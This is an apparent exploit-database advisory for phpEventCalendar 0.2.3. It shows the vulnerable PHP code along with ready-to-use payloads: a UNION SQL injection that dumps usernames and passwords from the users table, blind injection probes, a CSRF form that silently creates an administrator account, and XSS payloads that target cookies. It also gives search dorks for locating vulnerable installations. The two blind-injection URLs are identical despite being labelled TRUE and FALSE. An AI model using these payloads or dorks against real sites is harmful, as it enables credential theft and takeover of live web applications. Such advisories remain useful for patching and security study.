phpEventCalendar 0.2.3 - Multiple Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpEventCalendar 0.2.3 - Multiple Vulnerabilities
# Published : 2013-06-24
# Author :
# Previous Title : McAfee ePO 4.6.6 - Multiple Vulnerabilities
# Next Title : Machform Form Maker 2 - Multiple Vulnerabilities
phpEventCalendar v.0.2.3 Multiple Vulnerabilities
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://www.phpcodeworks.com/pec/downloads
.:. Dork           : [1]"phpEventGallery by ikemcg at ikemcg.com"
                     [2]"phpEventCalendar by ikemcg at ikemcg.com"
####################################################################

1:SQL INJECTION:   (http://www.exploit-db.com/exploits/4135/)
########################################
1-VULNERABILITY: CLASSIC MYSQL INJECTION
########################################

/eventdisplay.php (LINE: 12-14)

-----------------------------------------------------------------------------
 $sql = "SELECT d, m, y FROM " . DB_TABLE_PREFIX . "mssgs WHERE id=" .
$id;
 $result = mysql_query($sql) or die(mysql_error());
 $row = mysql_fetch_array($result);

-----------------------------------------------------------------------------

#####################################################
EXPLOIT
#####################################################

http://localhost/phpEventCalendar/eventdisplay.php?id=1+and+1=2+union+select+concat(uid,0x3a,username,0x3a,password),2,3+from+pec_users
-----------------------------------------------------------------------------
######################################
2-VULNERABILITY: BLIND MYSQL INJECTION
######################################

/eventform.php (LINE: 17-23)

-----------------------------------------------------------------------------
mysql_connect(DB_HOST, DB_USER, DB_PASS) or die(mysql_error());
        mysql_select_db(DB_NAME) or die(mysql_error());

        $sql = "SELECT uid FROM " . DB_TABLE_PREFIX . "mssgs WHERE id =
$id";

        $result = mysql_query($sql) or die(mysql_error());
        $row = mysql_fetch_assoc($result);

-----------------------------------------------------------------------------

#####################################################
EXPLOIT
#####################################################

http://localhost/phpEventCalendar/eventform.php?id=1+and+substring(@@version,1,1)=5
<< TRUE
http://localhost/phpEventCalendar/eventform.php?id=1+and+substring(@@version,1,1)=5
<< FALSE
-----------------------------------------------------------------------------


2:CSRF[ ADD ADMIN ]
########################################

<form method="POST" name="form0" action="
http://localhost/phpEventCalendar/useradmin.php?flag=insert">
<input type="hidden" name="username" value="ADMIN"/>
<input type="hidden" name="pw" value="123456"/>
<input type="hidden" name="pwconfirm" value="123456"/>
<input type="hidden" name="userlevel" value="2"/>
<input type="hidden" name="fname" value="MMMM"/>
<input type="hidden" name="lname" value="CCCC"/>
<input type="hidden" name="email" value="MYEMAIL@HOTMAIL.COM"/>
</form>

</body>
</html>
-----------------------------------------------------------------------------


3:Multiple Cross-Site Scripting
########################################

http://localhost/phpEventCalendar/eventform.php?id='"()%26%251<ScRiPt
>prompt(document.cookie)<%2fScRiPt>
http://localhost/phpEventCalendar/eventdisplay.php?id='"()%26%251<ScRiPt
>prompt(document.cookie)<%2fScRiPt>
####################################################################